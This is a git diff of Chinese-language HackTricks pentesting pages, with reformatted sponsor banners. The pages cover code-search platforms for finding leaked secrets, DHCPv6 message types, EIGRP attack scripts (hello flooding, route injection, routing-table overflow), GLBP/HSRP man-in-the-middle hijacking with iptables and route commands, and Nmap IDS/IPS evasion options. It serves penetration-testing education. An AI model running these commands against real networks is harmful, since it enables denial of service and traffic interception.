* **加入** 💬 [**Discord群**](https://discord.gg/hRep4RUj7f) 或 [**电报群**](https://t.me/peass) 或 **关注**我们的**Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**。**
|
||||
* 通过向[**HackTricks**](https://github.com/carlospolop/hacktricks)和[**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github仓库提交PR来分享您的黑客技巧。
|
||||
* 检查 [**订阅计划**](https://github.com/sponsors/carlospolop)!
|
||||
* **加入** 💬 [**Discord 群组**](https://discord.gg/hRep4RUj7f) 或 [**telegram 群组**](https://t.me/peass) 或 **关注** 我们的 **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
|
||||
* 通过向 [**HackTricks**](https://github.com/carlospolop/hacktricks) 和 [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github 仓库提交 PR 来分享黑客技巧。
|
||||
|
||||
</details>
|
||||
{% endhint %}
|
||||
|
||||
**Try Hard Security Group**
|
||||
|
||||
|
@ -22,18 +23,18 @@
|
|||
|
||||
***
|
||||
|
||||
本页面的目标是列举允许在一个或多个平台上搜索代码(文字或正则表达式)的**平台**。
|
||||
本页面的目标是列举**允许在数千/数百万个仓库中搜索代码**(文字或正则表达式)的平台。
|
||||
|
||||
这在多种情况下有助于搜索**泄漏信息**或**漏洞**模式。
|
||||
这有助于在多种情况下搜索**泄漏信息**或**漏洞**模式。
|
||||
|
||||
* [**SourceGraph**](https://sourcegraph.com/search): 在数百万个仓库中搜索。有免费版本和企业版本(15天免费)。支持正则表达式。
|
||||
* [**Github搜索**](https://github.com/search): 在Github上搜索。支持正则表达式。
|
||||
* 也许还有必要检查[**Github代码搜索**](https://cs.github.com/)。
|
||||
* [**Gitlab高级搜索**](https://docs.gitlab.com/ee/user/search/advanced\_search.html): 在Gitlab项目中搜索。支持正则表达式。
|
||||
* [**Github Search**](https://github.com/search): 在 Github 中搜索。支持正则表达式。
|
||||
* 也许还有必要检查 [**Github Code Search**](https://cs.github.com/)。
|
||||
* [**Gitlab Advanced Search**](https://docs.gitlab.com/ee/user/search/advanced\_search.html): 在 Gitlab 项目中搜索。支持正则表达式。
|
||||
* [**SearchCode**](https://searchcode.com/): 在数百万个项目中搜索代码。
|
||||
|
||||
{% hint style="warning" %}
|
||||
当您在一个仓库中寻找泄漏并运行类似`git log -p`的命令时,不要忘记可能存在**其他分支和其他提交**包含机密信息!
|
||||
当您在仓库中寻找泄漏并运行类似 `git log -p` 的命令时,不要忘记可能存在**包含机密信息的其他分支和其他提交**!
|
||||
{% endhint %}
|
||||
|
||||
**Try Hard Security Group**
|
||||
|
@ -42,16 +43,17 @@
|
|||
|
||||
{% embed url="https://discord.gg/tryhardsecurity" %}
|
||||
|
||||
{% hint style="success" %}
|
||||
学习并实践AWS Hacking:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks 培训 AWS 红队专家 (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
|
||||
学习并实践GCP Hacking: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks 培训 GCP 红队专家 (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
|
||||
|
||||
<details>
|
||||
|
||||
<summary><strong>从零开始学习AWS黑客技术,成为专家</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE(HackTricks AWS红队专家)</strong></a><strong>!</strong></summary>
|
||||
<summary>支持 HackTricks</summary>
|
||||
|
||||
支持HackTricks的其他方式:
|
||||
|
||||
* 如果您想看到您的**公司在HackTricks中做广告**或**下载PDF格式的HackTricks**,请查看[**订阅计划**](https://github.com/sponsors/carlospolop)!
|
||||
* 获取[**官方PEASS & HackTricks周边产品**](https://peass.creator-spring.com)
|
||||
* 发现[**PEASS家族**](https://opensea.io/collection/the-peass-family),我们的独家[**NFTs**](https://opensea.io/collection/the-peass-family)收藏品
|
||||
* **加入** 💬 [**Discord群**](https://discord.gg/hRep4RUj7f) 或 [**电报群**](https://t.me/peass) 或 **关注**我们的**Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**。**
|
||||
* 通过向[**HackTricks**](https://github.com/carlospolop/hacktricks)和[**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github仓库提交PR来分享您的黑客技巧。
|
||||
* 检查 [**订阅计划**](https://github.com/sponsors/carlospolop)!
|
||||
* **加入** 💬 [**Discord 群组**](https://discord.gg/hRep4RUj7f) 或 [**telegram 群组**](https://t.me/peass) 或 **关注** 我们的 **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
|
||||
* 通过向 [**HackTricks**](https://github.com/carlospolop/hacktricks) 和 [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github 仓库提交 PR 来分享黑客技巧。
|
||||
|
||||
</details>
|
||||
{% endhint %}
|
||||
|
|
|
@ -1,21 +1,22 @@
|
|||
{% hint style="success" %}
|
||||
学习并练习AWS Hacking:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks 培训 AWS 红队专家 (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
|
||||
学习并练习GCP Hacking: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks 培训 GCP 红队专家 (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
|
||||
|
||||
<details>
|
||||
|
||||
<summary><strong>从零开始学习AWS黑客技术,成为专家</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE(HackTricks AWS红队专家)</strong></a><strong>!</strong></summary>
|
||||
<summary>支持 HackTricks</summary>
|
||||
|
||||
支持HackTricks的其他方式:
|
||||
|
||||
* 如果您想看到您的**公司在HackTricks中做广告**或**下载PDF格式的HackTricks**,请查看[**订阅计划**](https://github.com/sponsors/carlospolop)!
|
||||
* 获取[**官方PEASS & HackTricks周边产品**](https://peass.creator-spring.com)
|
||||
* 探索[**PEASS家族**](https://opensea.io/collection/the-peass-family),我们独家的[**NFTs**](https://opensea.io/collection/the-peass-family)收藏品
|
||||
* **加入** 💬 [**Discord群**](https://discord.gg/hRep4RUj7f) 或 [**电报群**](https://t.me/peass) 或在**Twitter**上关注我们 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**。**
|
||||
* 通过向[**HackTricks**](https://github.com/carlospolop/hacktricks)和[**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github仓库提交PR来分享您的黑客技巧。
|
||||
* 检查 [**订阅计划**](https://github.com/sponsors/carlospolop)!
|
||||
* **加入** 💬 [**Discord 群组**](https://discord.gg/hRep4RUj7f) 或 [**telegram 群组**](https://t.me/peass) 或 **关注**我们的 **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
|
||||
* 通过向 [**HackTricks**](https://github.com/carlospolop/hacktricks) 和 [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github 仓库提交 PR 来分享黑客技巧。
|
||||
|
||||
</details>
|
||||
{% endhint %}
|
||||
|
||||
### DHCPv6与DHCPv4消息类型比较
|
||||
下表展示了DHCPv6和DHCPv4消息类型的比较:
|
||||
### DHCPv6 vs. DHCPv4 消息类型比较
|
||||
下表展示了 DHCPv6 和 DHCPv4 消息类型的比较:
|
||||
|
||||
| DHCPv6消息类型 | DHCPv4消息类型 |
|
||||
| DHCPv6 消息类型 | DHCPv4 消息类型 |
|
||||
|:-------------------|:-------------------|
|
||||
| Solicit (1) | DHCPDISCOVER |
|
||||
| Advertise (2) | DHCPOFFER |
|
||||
|
@ -28,19 +29,19 @@
|
|||
| Reconfigure (10) | DHCPFORCERENEW |
|
||||
| Relay-Forw (12), Relay-Reply (13) | 无 |
|
||||
|
||||
**DHCPv6消息类型详细解释:**
|
||||
**DHCPv6 消息类型详细解释:**
|
||||
|
||||
1. **Solicit (1)**: DHCPv6客户端发起以查找可用服务器。
|
||||
2. **Advertise (2)**: 服务器响应Solicit发送Advertise,指示提供DHCP服务。
|
||||
3. **Request (3)**: 客户端使用此消息从特定服务器请求IP地址或前缀。
|
||||
1. **Solicit (1)**: DHCPv6 客户端发起以查找可用服务器。
|
||||
2. **Advertise (2)**: 服务器响应 Solicit 发送 Advertise,表示提供 DHCP 服务。
|
||||
3. **Request (3)**: 客户端使用此消息从特定服务器请求 IP 地址或前缀。
|
||||
4. **Confirm (4)**: 客户端用于验证分配的地址在网络上是否仍然有效,通常在网络更改后使用。
|
||||
5. **Renew (5)**: 客户端向原始服务器发送此消息以延长地址生命周期或更新配置。
|
||||
6. **Rebind (6)**: 发送到任何服务器以延长地址生命周期或更新配置,特别是在未收到Renew的响应时。
|
||||
7. **Reply (7)**: 服务器使用此消息提供地址、配置参数,或确认Release或Decline等消息。
|
||||
6. **Rebind (6)**: 发送到任何服务器以延长地址生命周期或更新配置,特别是在 Renew 未收到响应时。
|
||||
7. **Reply (7)**: 服务器使用此消息提供地址、配置参数,或确认 Release 或 Decline 等消息。
|
||||
8. **Release (8)**: 客户端通知服务器停止使用一个或多个分配的地址。
|
||||
9. **Decline (9)**: 客户端发送此消息报告分配的地址在网络上存在冲突。
|
||||
10. **Reconfigure (10)**: 服务器提示客户端启动新的或更新配置的事务。
|
||||
11. **Information-Request (11)**: 客户端请求配置参数而不分配IP地址。
|
||||
11. **Information-Request (11)**: 客户端请求配置参数而不分配 IP 地址。
|
||||
12. **Relay-Forw (12)**: 中继代理将消息转发到服务器。
|
||||
13. **Relay-Repl (13)**: 服务器回复中继代理,然后将消息传递给客户端。
|
||||
|
||||
|
@ -48,16 +49,17 @@
|
|||
* [https://support.huawei.com/enterprise/en/doc/EDOC1100306163/d427e938/introduction-to-dhcpv6-messages](https://support.huawei.com/enterprise/en/doc/EDOC1100306163/d427e938/introduction-to-dhcpv6-messages)
|
||||
|
||||
|
||||
{% hint style="success" %}
|
||||
学习并练习AWS Hacking:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks 培训 AWS 红队专家 (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
|
||||
学习并练习GCP Hacking: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks 培训 GCP 红队专家 (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
|
||||
|
||||
<details>
|
||||
|
||||
<summary><strong>从零开始学习AWS黑客技术,成为专家</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE(HackTricks AWS红队专家)</strong></a><strong>!</strong></summary>
|
||||
<summary>支持 HackTricks</summary>
|
||||
|
||||
支持HackTricks的其他方式:
|
||||
|
||||
* 如果您想看到您的**公司在HackTricks中做广告**或**下载PDF格式的HackTricks**,请查看[**订阅计划**](https://github.com/sponsors/carlospolop)!
|
||||
* 获取[**官方PEASS & HackTricks周边产品**](https://peass.creator-spring.com)
|
||||
* 探索[**PEASS家族**](https://opensea.io/collection/the-peass-family),我们独家的[**NFTs**](https://opensea.io/collection/the-peass-family)收藏品
|
||||
* **加入** 💬 [**Discord群**](https://discord.gg/hRep4RUj7f) 或 [**电报群**](https://t.me/peass) 或在**Twitter**上关注我们 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**。**
|
||||
* 通过向[**HackTricks**](https://github.com/carlospolop/hacktricks)和[**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github仓库提交PR来分享您的黑客技巧。
|
||||
* 检查 [**订阅计划**](https://github.com/sponsors/carlospolop)!
|
||||
* **加入** 💬 [**Discord 群组**](https://discord.gg/hRep4RUj7f) 或 [**telegram 群组**](https://t.me/peass) 或 **关注**我们的 **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
|
||||
* 通过向 [**HackTricks**](https://github.com/carlospolop/hacktricks) 和 [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github 仓库提交 PR 来分享黑客技巧。
|
||||
|
||||
</details>
|
||||
{% endhint %}
|
||||
|
|
|
@ -1,24 +1,25 @@
|
|||
# EIGRP 攻击
|
||||
|
||||
{% hint style="success" %}
|
||||
学习并练习 AWS 黑客技术:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks 培训 AWS 红队专家 (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
|
||||
学习并练习 GCP 黑客技术:<img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks 培训 GCP 红队专家 (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
|
||||
|
||||
<details>
|
||||
|
||||
<summary><strong>从零开始学习 AWS 黑客技术,成为专家</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE(HackTricks AWS 红队专家)</strong></a><strong>!</strong></summary>
|
||||
<summary>支持 HackTricks</summary>
|
||||
|
||||
支持 HackTricks 的其他方式:
|
||||
|
||||
* 如果您想看到您的**公司在 HackTricks 中做广告**或**下载 PDF 版的 HackTricks**,请查看[**订阅计划**](https://github.com/sponsors/carlospolop)!
|
||||
* 获取[**官方 PEASS & HackTricks 商品**](https://peass.creator-spring.com)
|
||||
* 探索[**PEASS 家族**](https://opensea.io/collection/the-peass-family),我们的独家[**NFT**](https://opensea.io/collection/the-peass-family)收藏品
|
||||
* **加入** 💬 [**Discord 群组**](https://discord.gg/hRep4RUj7f) 或 [**电报群组**](https://t.me/peass) 或在 **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)** 上**关注我们。
|
||||
* 通过向 [**HackTricks**](https://github.com/carlospolop/hacktricks) 和 [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github 仓库提交 PR 来分享您的黑客技巧。
|
||||
* 查看 [**订阅计划**](https://github.com/sponsors/carlospolop)!
|
||||
* **加入** 💬 [**Discord 群组**](https://discord.gg/hRep4RUj7f) 或 [**电报群组**](https://t.me/peass) 或 **关注** 我们的 **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
|
||||
* 通过向 [**HackTricks**](https://github.com/carlospolop/hacktricks) 和 [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github 仓库提交 PR 来分享黑客技巧。
|
||||
|
||||
</details>
|
||||
{% endhint %}
|
||||
|
||||
**这是** [**https://medium.com/@in9uz/cisco-nightmare-pentesting-cisco-networks-like-a-devil-f4032eb437b9**](https://medium.com/@in9uz/cisco-nightmare-pentesting-cisco-networks-like-a-devil-f4032eb437b9) **中公开的攻击摘要。请查看以获取更多信息。**
|
||||
**这是** [**https://medium.com/@in9uz/cisco-nightmare-pentesting-cisco-networks-like-a-devil-f4032eb437b9**](https://medium.com/@in9uz/cisco-nightmare-pentesting-cisco-networks-like-a-devil-f4032eb437b9) **中公开的攻击摘要。查看以获取更多信息。**
|
||||
|
||||
## **伪造 EIGRP 邻居攻击**
|
||||
|
||||
- **目标**:通过向路由器发送大量 EIGRP hello 数据包来使路由器 CPU 过载,可能导致拒绝服务(DoS)攻击。
|
||||
- **目标**:通过向路由器发送大量 EIGRP hello 数据包来使路由器 CPU 过载,可能导致拒绝服务 (DoS) 攻击。
|
||||
- **工具**:**helloflooding.py** 脚本。
|
||||
- **执行**:
|
||||
```bash
|
||||
|
@ -31,7 +32,7 @@
|
|||
|
||||
## **EIGRP 黑洞攻击**
|
||||
|
||||
- **目标**:通过注入虚假路由来破坏网络流量流向,导致流量被定向到不存在的目的地的黑洞。
|
||||
- **目标**:通过注入虚假路由来干扰网络流量,导致流量被定向到不存在的目的地的黑洞。
|
||||
- **工具**:**routeinject.py** 脚本。
|
||||
- **执行**:
|
||||
```bash
|
||||
|
@ -46,7 +47,7 @@
|
|||
|
||||
## **滥用 K-Values 攻击**
|
||||
|
||||
- **目标**:通过注入修改后的 K-Values,在 EIGRP 域内创建持续的中断和重新连接,有效地导致 DoS 攻击。
|
||||
- **目标**:通过注入修改后的 K-Values 在 EIGRP 域内创建持续的中断和重新连接,有效地导致 DoS 攻击。
|
||||
- **工具**:**relationshipnightmare.py** 脚本。
|
||||
- **执行**:
|
||||
```bash
|
||||
|
@ -69,3 +70,19 @@ sudo python3 routingtableoverflow.py --interface eth0 --as 1 --src 10.10.100.50
|
|||
- `--interface`:指定网络接口。
|
||||
- `--as`:定义 EIGRP AS 号。
|
||||
- `--src`:设置攻击者的 IP 地址。
|
||||
|
||||
|
||||
{% hint style="success" %}
|
||||
学习并练习 AWS 黑客技术:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks 培训 AWS 红队专家 (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
|
||||
学习并练习 GCP 黑客技术:<img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks 培训 GCP 红队专家 (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
|
||||
|
||||
<details>
|
||||
|
||||
<summary>支持 HackTricks</summary>
|
||||
|
||||
* 查看 [**订阅计划**](https://github.com/sponsors/carlospolop)!
|
||||
* **加入** 💬 [**Discord 群组**](https://discord.gg/hRep4RUj7f) 或 [**电报群组**](https://t.me/peass) 或 **关注** 我们的 **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
|
||||
* 通过向 [**HackTricks**](https://github.com/carlospolop/hacktricks) 和 [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github 仓库提交 PR 来分享黑客技巧。
|
||||
|
||||
</details>
|
||||
{% endhint %}
|
||||
|
|
|
@ -1,18 +1,19 @@
|
|||
# GLBP & HSRP 攻击
|
||||
|
||||
{% hint style="success" %}
|
||||
学习并练习 AWS 黑客技能:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks 培训 AWS 红队专家 (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
|
||||
学习并练习 GCP 黑客技能:<img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks 培训 GCP 红队专家 (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
|
||||
|
||||
<details>
|
||||
|
||||
<summary><strong>从零开始学习 AWS 黑客技术,成为专家</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE(HackTricks AWS 红队专家)</strong></a><strong>!</strong></summary>
|
||||
<summary>支持 HackTricks</summary>
|
||||
|
||||
支持 HackTricks 的其他方式:
|
||||
|
||||
* 如果您想看到您的**公司在 HackTricks 中做广告**或**下载 PDF 版本的 HackTricks**,请查看[**订阅计划**](https://github.com/sponsors/carlospolop)!
|
||||
* 获取[**官方 PEASS & HackTricks 商品**](https://peass.creator-spring.com)
|
||||
* 探索[**PEASS 家族**](https://opensea.io/collection/the-peass-family),我们的独家[**NFTs**](https://opensea.io/collection/the-peass-family)
|
||||
* **加入** 💬 [**Discord 群组**](https://discord.gg/hRep4RUj7f) 或 [**电报群组**](https://t.me/peass) 或**关注**我们的**Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**。**
|
||||
* 通过向 [**HackTricks**](https://github.com/carlospolop/hacktricks) 和 [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github 仓库提交 PR 来分享您的黑客技巧。
|
||||
* 查看[**订阅计划**](https://github.com/sponsors/carlospolop)!
|
||||
* **加入** 💬 [**Discord 群组**](https://discord.gg/hRep4RUj7f) 或 [**电报群组**](https://t.me/peass) 或 **关注**我们的 **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
|
||||
* 通过向 [**HackTricks**](https://github.com/carlospolop/hacktricks) 和 [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github 仓库提交 PR 来分享黑客技巧。
|
||||
|
||||
</details>
|
||||
{% endhint %}
|
||||
|
||||
<figure><img src="https://pentest.eu/RENDER_WebSec_10fps_21sec_9MB_29042024.gif" alt=""><figcaption></figcaption></figure>
|
||||
|
||||
|
@ -20,14 +21,14 @@
|
|||
|
||||
## FHRP 劫持概述
|
||||
|
||||
### FHRP 概览
|
||||
### FHRP 洞察
|
||||
FHRP 旨在通过将多个路由器合并为单个虚拟单元来提供网络鲁棒性,从而增强负载分配和容错能力。思科系统推出了该套件中的重要协议,如 GLBP 和 HSRP。
|
||||
|
||||
### GLBP 协议概述
|
||||
思科的创造,GLBP,在 TCP/IP 协议栈上运行,利用端口 3222 上的 UDP 进行通信。GLBP 组中的路由器每隔 3 秒交换一次“hello”数据包。如果路由器在 10 秒内未发送这些数据包,则被视为离线。但是,这些计时器不是固定的,可以进行修改。
|
||||
### GLBP 协议洞察
|
||||
思科的创造,GLBP,在 TCP/IP 协议栈上运行,利用 UDP 在端口 3222 上进行通信。GLBP 组中的路由器每隔 3 秒交换一次“hello”数据包。如果路由器在 10 秒内未发送这些数据包,则被视为离线。但是,这些计时器不是固定的,可以进行修改。
|
||||
|
||||
### GLBP 操作和负载分配
|
||||
GLBP 通过使用单个虚拟 IP 和多个虚拟 MAC 地址实现跨路由器的负载分配。在 GLBP 组中,每个路由器都参与数据包转发。与 HSRP/VRRP 不同,GLBP 通过几种机制提供真正的负载平衡:
|
||||
GLBP 通过使用单个虚拟 IP 和多个虚拟 MAC 地址在路由器之间实现负载分配。在 GLBP 组中,每个路由器都参与数据包转发。与 HSRP/VRRP 不同,GLBP 通过几种机制提供真正的负载平衡:
|
||||
|
||||
- **主机相关负载平衡:** 为主机保持一致的 AVF MAC 地址分配,对于稳定的 NAT 配置至关重要。
|
||||
- **轮询负载平衡:** 默认方法,在请求主机之间交替分配 AVF MAC 地址。
|
||||
|
@ -54,8 +55,8 @@ GLBP 通过使用单个虚拟 IP 和多个虚拟 MAC 地址实现跨路由器的
|
|||
3. 生成一个恶意的 Gratuitous ARP。
|
||||
4. 注入一个恶意的 GLBP 数据包,冒充 AVG。
|
||||
5. 为攻击者的网络接口分配一个次要 IP 地址,镜像 GLBP 虚拟 IP。
|
||||
6. 实施 SNAT 以完全可见流量。
|
||||
7. 调整路由以确保通过原始 AVG 路由器继续访问互联网。
|
||||
6. 实施 SNAT 以实现完整的流量可见性。
|
||||
7. 调整路由以确保通过原始 AVG 路由器持续访问互联网。
|
||||
|
||||
通过遵循这些步骤,攻击者将自己定位为“中间人”,能够拦截和分析网络流量,包括未加密或敏感数据。
|
||||
|
||||
|
@ -73,11 +74,9 @@ sudo iptables -t nat -A POSTROUTING -o eth0 -j MASQUERADE
|
|||
sudo route del default
|
||||
sudo route add -net 0.0.0.0 netmask 0.0.0.0 gw 10.10.100.100
|
||||
```
|
||||
### 使用net-creds.py或类似工具来捕获和分析流经受损网络的数据,可以监视和拦截流量。
|
||||
|
||||
### HSRP劫持的被动解释及命令详细信息
|
||||
|
||||
#### HSRP概述(热备份路由器/冗余协议)
|
||||
#### HSRP(热备份路由器/冗余协议)概述
|
||||
HSRP是思科专有协议,旨在实现网络网关冗余。它允许将多个物理路由器配置为单个逻辑单元,共享一个IP地址。这个逻辑单元由主路由器管理,负责流量导向。与GLBP不同,GLBP使用优先级和权重等指标进行负载平衡,HSRP依赖单个活动路由器进行流量管理。
|
||||
|
||||
#### HSRP中的角色和术语
|
||||
|
|
|
@ -1,71 +1,73 @@
|
|||
{% hint style="success" %}
|
||||
学习并练习AWS Hacking:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks 培训 AWS 红队专家 (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
|
||||
学习并练习GCP Hacking: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks 培训 GCP 红队专家 (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
|
||||
|
||||
<details>
|
||||
|
||||
<summary><strong>从零开始学习AWS黑客技术,成为专家</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE(HackTricks AWS红队专家)</strong></a><strong>!</strong></summary>
|
||||
<summary>支持 HackTricks</summary>
|
||||
|
||||
支持HackTricks的其他方式:
|
||||
|
||||
* 如果您想看到您的**公司在HackTricks中做广告**或**下载PDF格式的HackTricks**,请查看[**订阅计划**](https://github.com/sponsors/carlospolop)!
|
||||
* 获取[**官方PEASS & HackTricks周边产品**](https://peass.creator-spring.com)
|
||||
* 探索[**PEASS家族**](https://opensea.io/collection/the-peass-family),我们的独家[**NFTs**](https://opensea.io/collection/the-peass-family)收藏品
|
||||
* **加入** 💬 [**Discord群**](https://discord.gg/hRep4RUj7f) 或 [**电报群**](https://t.me/peass) 或在**Twitter**上关注我们 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**。**
|
||||
* 通过向[**HackTricks**](https://github.com/carlospolop/hacktricks)和[**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github仓库提交PR来分享您的黑客技巧。
|
||||
* 检查 [**订阅计划**](https://github.com/sponsors/carlospolop)!
|
||||
* **加入** 💬 [**Discord 群组**](https://discord.gg/hRep4RUj7f) 或 [**telegram 群组**](https://t.me/peass) 或 **关注** 我们的 **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
|
||||
* 通过向 [**HackTricks**](https://github.com/carlospolop/hacktricks) 和 [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github 仓库提交 PR 来分享黑客技巧。
|
||||
|
||||
</details>
|
||||
{% endhint %}
|
||||
|
||||
|
||||
# **TTL操纵**
|
||||
# **TTL 操纵**
|
||||
|
||||
发送一些具有足够TTL以到达IDS/IPS但不足以到达最终系统的数据包。然后,发送另一个具有与其他数据包相同序列的数据包,以便IPS/IDS会认为它们是重复的并不会检查它们,但实际上它们携带了恶意内容。
|
||||
发送一些 TTL 足以到达 IDS/IPS 的数据包,但不足以到达最终系统。然后,发送另一些具有与其他数据包相同序列的数据包,这样 IPS/IDS 将认为它们是重复的并不会检查它们,但实际上它们携带了恶意内容。
|
||||
|
||||
**Nmap选项:** `--ttlvalue <value>`
|
||||
**Nmap 选项:** `--ttlvalue <value>`
|
||||
|
||||
# 避免签名
|
||||
|
||||
只需向数据包添加垃圾数据,以避免IPS/IDS签名。
|
||||
只需向数据包添加垃圾数据,以避免 IPS/IDS 签名。
|
||||
|
||||
**Nmap选项:** `--data-length 25`
|
||||
**Nmap 选项:** `--data-length 25`
|
||||
|
||||
# **分段数据包**
|
||||
|
||||
只需分段数据包并发送它们。如果IDS/IPS无法重新组装它们,它们将到达最终主机。
|
||||
只需分段数据包并发送它们。如果 IDS/IPS 无法重新组装它们,它们将到达最终主机。
|
||||
|
||||
**Nmap选项:** `-f`
|
||||
**Nmap 选项:** `-f`
|
||||
|
||||
# **无效** _**校验和**_
|
||||
|
||||
传感器通常不会计算校验和以提高性能。因此,攻击者可以发送一个数据包,该数据包将被传感器解释但被最终主机拒绝。示例:
|
||||
传感器通常不会计算校验和以提高性能。因此,攻击者可以发送一个数据包,该数据包将被传感器解释但被最终主机拒绝。例如:
|
||||
|
||||
发送一个带有RST标志和无效校验和的数据包,因此,IPS/IDS可能会认为此数据包将关闭连接,但最终主机将丢弃该数据包,因为校验和无效。
|
||||
发送一个带有 RST 标志和无效校验和的数据包,因此,IPS/IDS 可能会认为此数据包将关闭连接,但最终主机将丢弃该数据包,因为校验和无效。
|
||||
|
||||
# **不常见的IP和TCP选项**
|
||||
# **不常见的 IP 和 TCP 选项**
|
||||
|
||||
传感器可能会忽略在IP和TCP头中设置的某些标志和选项的数据包,而目标主机在接收后接受该数据包。
|
||||
传感器可能会忽略在 IP 和 TCP 标头中设置的某些标志和选项的数据包,而目标主机在接收后接受该数据包。
|
||||
|
||||
# **重叠**
|
||||
|
||||
当您分段数据包时,可能存在某种重叠(也许数据包2的前8个字节与数据包1的最后8个字节重叠,数据包2的最后8个字节与数据包3的前8个字节重叠)。然后,如果IDS/IPS以与最终主机不同的方式重新组装它们,将解释为不同的数据包。\
|
||||
当您分段数据包时,可能存在某种重叠(也许数据包 2 的前 8 个字节与数据包 1 的最后 8 个字节重叠,数据包 2 的最后 8 个字节与数据包 3 的前 8 个字节重叠)。然后,如果 IDS/IPS 以与最终主机不同的方式重新组装它们,将解释为不同的数据包。\
|
||||
或者,也许,两个具有相同偏移量的数据包到达,主机必须决定采用哪一个。
|
||||
|
||||
* **BSD**:它偏好具有较小**偏移量**的数据包。对于具有相同偏移量的数据包,它将选择第一个数据包。
|
||||
* **Linux**:与BSD类似,但它更喜欢具有相同偏移量的最后一个数据包。
|
||||
* **First**(Windows):来的第一个值,就是留下的值。
|
||||
* **Last**(思科):来的最后一个值,就是留下的值。
|
||||
* **BSD**: 偏好具有较小 _偏移量_ 的数据包。对于具有相同偏移量的数据包,它将选择第一个数据包。
|
||||
* **Linux**: 类似于 BSD,但它更喜欢具有相同偏移量的最后一个数据包。
|
||||
* **First** (Windows): 来的第一个值,就是留下的值。
|
||||
* **Last** (cisco): 来的最后一个值,就是留下的值。
|
||||
|
||||
# 工具
|
||||
|
||||
* [https://github.com/vecna/sniffjoke](https://github.com/vecna/sniffjoke)
|
||||
|
||||
|
||||
{% hint style="success" %}
|
||||
